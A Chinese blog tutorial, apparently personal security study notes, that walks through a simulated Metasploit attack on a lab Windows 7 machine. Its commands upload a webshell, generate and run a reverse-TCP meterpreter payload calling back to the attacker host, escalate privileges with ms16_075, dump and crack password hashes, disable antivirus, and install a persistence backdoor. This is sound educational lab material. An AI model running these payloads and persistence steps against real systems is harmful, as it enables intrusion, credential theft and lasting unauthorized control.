MSF(1)——一次完整的渗透流程

最新推荐文章于 2023-09-02 10:45:52 发布
最新推荐文章于 2023-09-02 10:45:52 发布
阅读量3.9k 收藏 28
点赞数 9
分类专栏: 安全 文章标签: 安全 linux msf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/realmels/article/details/120102624
版权

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各种注入
  7. SQL注入(3)——SQLMAP
  8. SQL注入(4)——实战SQL注入拿webshell
  9. Vulnhub靶机渗透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞
  14. Vulnhub靶机渗透之zico2
  15. 命令执行漏洞
  16. 逻辑漏洞(越权访问和支付漏洞)
  17. 网站后台安全
  18. weevely的使用及免杀(Linux中的菜刀)

介绍

Metasploit(简称msf)框架是一个开源的,旨在方便地进行渗透测试的框架,由Ruby语言编写而成,具有很好地拓展性,便于渗透测试人员开发,使用定制的工具模板。

Kali Linux自带了Metasploit,在控制台输入msfconsole,启动msf
在这里插入图片描述
kali中自带的msf版本是5,可自行升级。

笔者的话:本来我是不想写msf框架的,因为我认为Web安全只需要拿到WebShell就达到了目标,但是在我经过了几次实战时候,我发现了msf的重要性,msf框架在漏洞扫描,后渗透等多个方面都非常优秀,因此有了这篇文章。

Metasploit基础

msf存在多个模块,在这里进行介绍

  1. Auxiliaries(辅助模块)
该模块不会直接在测试者和目标主机之间建立访问,它们只负责执行
扫描、嗅探、指纹识别等相关功能以辅助渗透测试
  1. Exploit(漏洞利用模块)
漏洞利用是指由渗透测试者利用一个系统、应用或者服务中的安全漏洞
进行的攻击行为。流行的渗透攻击技术包括缓冲区溢出、Web应用程序
攻击,以及利用配置错误等,其中包含攻击者或渗透测试人员针对系统
中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码,
每个漏洞都有相应的攻击代码。
  1. Payload(攻击载荷模块)
攻击载荷是我们期望目标系统在被渗透攻击之后完成实际攻击功能的代码,
成功渗透目标后,用于在目标系统上运行任意命令或者执行特定代码,
在Metasploit框架中可以自由地选择、传送和植入。攻击载荷也可能
是简单地在目标操作系统系统上执行一些命令,如添加用户账号等。
  1. Post(后渗透模块)
该模块主要用于在取得目标系统远程控制权后,进行一系列的后渗透
攻击动作,如获取敏感信息、实施跳板攻击等。
  1. Encoders(编码工具模块)
该模块在渗透测试中负责免杀,以防止被杀毒软件、防火墙、
IDS及类似的安全软件检测出。

我将通过一个完整的渗透测试来进行msf框架的初步讲解,这是我在一次实战中的操作,我用虚拟机进行了简单的模拟。

攻击机(Kali):192.168.157.131
目标机(Win7 x64):192.168.157.128

实战

访问目标机,看见一个文件上传点。
在这里插入图片描述
尝试上传WebShell,提示 “不正确的文件类型”
在这里插入图片描述
使用bp抓包,上传图片马,提示保存成功
在这里插入图片描述
把后缀改为php,成功上传
在这里插入图片描述
蚁剑访问,成功获取WebShell
在这里插入图片描述
使用whoami指令查看当前权限
在这里插入图片描述
在Kali中输入以下指令生成一个msf的木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.157.131 lport=4444 -f exe > shell.exe

其中, windows/meterpreter/reverse_tcp 是msf将要使用的 payloadlhost 是攻击机的ip地址,lport 是攻击机将要监听的端口。

通过这个语句,生成一个exe的木马
在这里插入图片描述
接下来将木马上传到被攻击的服务器上
在这里插入图片描述
在kali下输入msfconsole进入msf的控制台
输入:use exploit/multi/handler进入远程控制模块
输入:set payload windows/meterpreter/reverse_tcp使用Windows tcp远程反弹Payload
在这里插入图片描述
输入options查看该模块的参数
在这里插入图片描述
其中 LHOST 是生成木马时填写的 lhostLPORT 是生成木马时填写的 lport

输入:set LHOST 192.168.157.131来设置攻击机ip地址
输入:set LPORT 4444来设置攻击机监听端口
在这里插入图片描述
可以通过options查看当前参数
在这里插入图片描述
参数中Require的值为Yes的参数是必填项

接下来,输入runexploit开始监听
在这里插入图片描述

同时,在蚁剑中,进入控制台,输入shell.exe运行我们先前上传的木马程序
在这里插入图片描述
此时可以看到,在msf中收到了响应,反弹了一个Meterpreter的shell
在这里插入图片描述
Meterpreter中输入help查看帮助信息,在这里简单讲解一些指令

Meterpreter

Meterpreter常用指令
指令介绍
migrate进程迁徙。可以通过“migrate pid”来迁徙到其他进程中。其中,pid是被迁徙的进程id。(注:只有Windows可用)
getuid获取当前权限
getpid获取当前进程id
sysinfo返回系统信息
getsystem直接提升到最高权限(一般成功不了)
run killav关闭杀毒软件。在取得Meterpreter shell后最好最先执行该语句
shell进入目标机shell,输入“exit”退回到Meterpreter
pwd或getwd查看当前处于目标机的哪个目录
ls列出当前目录下的所有文件
cd切换目录
search在目标机中搜索文件。例如输入“search -f *.txt -d C:/”搜索C盘中所有后缀为txt的文件
upload上传文件。例如输入“upload 1.txt C:/1.txt”将攻击机目录下的1.txt上传到目标机的C盘
download下载文件。例如输入“download C:/1.txt 1.txt”将目标机C盘下的1.txt下载到攻击机上

提权

输入getuid查看当前权限,发现是manlu权限
在这里插入图片描述
输入shell进入目标机shell,输入systeminfo查看系统详细信息,包括但不限于系统补丁信息
在这里插入图片描述
在这里插入图片描述
接下来要在补丁中查找那些没有打的补丁,并且去网上找相关的exp进行提权

在这里我使用ms16_075 (KB3164038) 漏洞进行提权

回到meterpreter shell,输入background将当前shell转为后台执行,可以输入sessions查看目前已建立的session
在这里插入图片描述
接下来输入search ms16_075寻找相应的exp
在这里插入图片描述
可以看到,名为exploit/windows/local/ms16_075_reflection_juicy的exp评价是great,在这里就使用该exp进行提权

输入:use exploit/windows/local/ms16_075_reflection_juicyuse 1来选取要使用的exp
在这里插入图片描述
输入options查看该exp参数
在这里插入图片描述
只有一个参数SESSION需要填写

输入sessions查看建立的连接,找到需要提权的session,通过SET指定SESSION
在这里插入图片描述
接下来输入run执行即可

如果提权成功,会重新返回一个Meterpreter shell
在这里插入图片描述
此时再输入getuid查看权限,发现我们已经是system
在这里插入图片描述

抓取密码

在这里简单讲一下密码的抓取,具体的密码抓取会在之后详细讲解

在Meterpreter shell中输入run windows/gather/hashdump导出密码
在这里插入图片描述
得到密码的格式是类似这样的

UserName:500:xxxx:xxxx

其中第一个是用户名,第二个数字代表权限,500表示是管理员权限,后面两个加密的内容是密码,其中第二个加密的内容就是用户密码

例如,我想获取用户manlu的密码,我将密文复制

32ed87bdb5fdc5e9cba88547376818d4

接下来在网上解密
在这里插入图片描述
得到用户manlu的明文密码为123456

注:抓取密码需要SYSTEM权限

权限维持

我们通过持久化后门来进行权限维持

Persistence是一款使用安装自启动方式的持久性后门程序,可以利用它创建注册和文件。

输入run persistence -h查看所有的命令选项

在这里插入图片描述
输入指令:

run persistence -A -S -U -i 10 -p 1234 -r 192.168.157.131

语法解释:

  • A:自动启动Payload程序
  • S:系统启动时自动加载
  • U:用户登录时自动启动
  • X:开机时自动加载
  • i:回连的时间间隔
  • P:监听的反向链接端口号
  • r:攻击机IP地址

在这个语句中,我设置每隔10秒钟回连一次,这样目标机就会每隔10秒连接一次攻击机。

可以看到,在输入指令后,提示在目标机上新建了一个vbs文件并创建了一个服务。
在这里插入图片描述
此时我们重新打开一个msf终端,设置
payload:

windows/meterpreter/reverse_tcp

lhost:

192.168.157.131

lport:

1234

等待10秒,就可以收到目标机的连接
在这里插入图片描述
这样成功创建了持久化后门

结语

这篇文章并不是正式的教程,只是为了写一下使用Metasploit框架渗透的基本流程,同时写出msf框架的强大之处。在之后的文章,会详细写Metasploit框架的操作。

漫路在线
关注
  • 9
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
47-4 内网渗透 - MSF介绍
weixin_43263566的博客
06-15 145
Metasploit框架(Metasploit Framework, MSF)是一款开源工具,专为渗透测试设计。它由Ruby编程语言编写,具有高度的扩展性,可以方便渗透测试人员开发和使用定制化的工具模板。Metasploit提供多种接口来控制测试过程,包括控制台、Web界面和命令行界面(CLI)。推荐使用控制台接口,因为它可以访问和使用所有Metasploit的插件,如Payload、漏洞利用模块、后渗透模块等。
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
msf完整渗透测试
clayzx的博客
11-15 6536
从生成shell到远程连接 前言: 本来是最近打算把时间都花在学c上,渗透目前跟着老师学以后研究,但为了后续上课需求,就必须把这个给拿下了,于是花了今天一天的时间都在研究这个,写一篇详细的实验结果,为了给自己做笔记,也为了刚学msfconsole提供一个资料参考。不说废话了,以下是我们这篇的目标: 1.生成shell 2.上shell 3.监听 4.拿到会话 5.提权 6.拿到密码 7.远程连接 首先此次实验需要准备一台kali的虚拟机和一台windows 7的
msf渗透测试学习-与永恒之蓝漏洞案例
weixin_49349476的博客
06-08 4560
MSF是Metasploit Framework的缩写,是一款广泛使用的渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
内网渗透 Metasploit(MSF)基础使用
qq_49433473的博客
10-24 1万+
内网渗透 Metasploit(MSF)使用,信息搜集,模块详解,端口扫描,反弹shell
metasploit(MSF渗透超细解说 -- 小黑渗透工具
G_WEB_Xie的博客
05-18 1933
metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!!初心: 记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有一些不足的地方大家可以指出来,我会在本博客中添加补充,也会将大家的名字备注在补充的章节内!!一起加油 ^-^本章出后后续会出实战测试,也会将win和linux常用命令做一期更新。
初学MSF渗透、提权、免杀(上)
qq_53058639的博客
08-01 1785
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
1. **Metasploit Framework**:这是一个开源的渗透测试框架,包含了大量已知漏洞的exploits(利用代码),payloads(有效负载)以及辅助模块,帮助安全专业人员发现并测试系统漏洞。它支持多种操作系统,包括Windows...
kali 渗透msf
11-14
kali渗透测试利器
渗透工具之msf
热门推荐
rentian1的博客
03-30 4万+
转载自 csdn:忆蓉之心 简介 它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 环境 工具:msf4 伪装木马 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。 构造...
渗透工具——kali中msf简介(以及MSF的基本使用方法
最新发布
2301_78006725的博客
09-02 7055
设置payload:set payload windows/x64/meterpreter/reverse_tcp。1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue。设置模块:use auxiliary/scanner/smb/smb_ms17_010。攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。设置目标地址:set RHOSTS [目标地址]
渗透测试工具MSF
2303_77223717的博客
07-08 1128
Metasploit Framework 简称MSF,是一款开源的安全漏洞检测工具。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台,集成数千个漏洞利用、辅助测试模块。
Linux-Metasploit 渗透-魔鬼教程
m0_74025111的博客
04-20 2897
这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞,换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。进行专业的渗透测试后,即使是系统未被攻破,也可以证明先前实行的防御是有效的,专业的渗透测试可以有效评估系统的安全状况,并提出合理的改进方案。用方法 -p 端口号) -sV 扫描服务器版本。
MSF渗透基础知识
m0_63917373的博客
02-20 407
MSF windows提权 渗透安卓 Metasploit
msf相关讲解
weixin_46476861的博客
01-22 1万+
Metasploit就是一个安全漏洞检测工具。它的全称叫做The Metasploit Framework,简称MSFmsf专业术语: 1 渗透攻击(Exploit) 攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。 2 攻击载荷(Payload) 目标系统在被渗透攻击后而执行的代码。在MSF框架中可以自由的选择、传送和植入。 3 溢出代码(Shellcode) 渗透攻击时作为攻击载荷运行的一组机器指令。shellcode通常用汇编语言编写。 4 模块(Module) 在MSF
详尽的msf——meterpreter——渗透测试教程
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
使用kali 中的msf对自己的手机进行渗透完整指令
06-11
在使用 Metasploit 渗透测试工具进行攻击前,需要明确一点:您必须拥有目标手机的授权。否则,您的行为将违反法律法规,承担法律责任。 以下是在 Kali 中使用 Metasploit 渗透测试工具对 Android 手机进行攻击的一般步骤: 1. 打开终端,输入 `msfconsole` 命令启动 Metasploit 控制台。 2. 在 Metasploit 控制台中,输入 `use exploit/multi/handler` 命令,选择要使用的 exploit 模块。 3. 设置监听器参数,包括 `LHOST`(监听主机的 IP 地址)和 `LPORT`(监听的端口号)。例如,输入 `set LHOST 192.168.0.100` 和 `set LPORT 4444` 命令设置监听器。 4. 输入 `exploit` 命令启动监听器,并等待目标手机连接。 5. 在目标手机上安装 Metasploit 的反向 shell 客户端。可以使用 Metasploit 中的 `android/meterpreter/reverse_tcp` 模块生成反向 shell 客户端,或者使用其他工具生成。将反向 shell 客户端安装在目标手机上。 6. 反向 shell 客户端连接到监听器后,您就可以在 Metasploit 控制台中执行一些命令,例如 `meterpreter > sysinfo` 命令查看目标手机的系统信息,或者 `meterpreter > shell` 命令在目标手机上打开一个 shell 终端。 请注意,这只是一般的步骤,实际操作中可能会因为目标手机的不同而有所不同。而且,再次强调,您必须拥有目标手机的授权才能进行渗透测试,否则将涉嫌违法行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值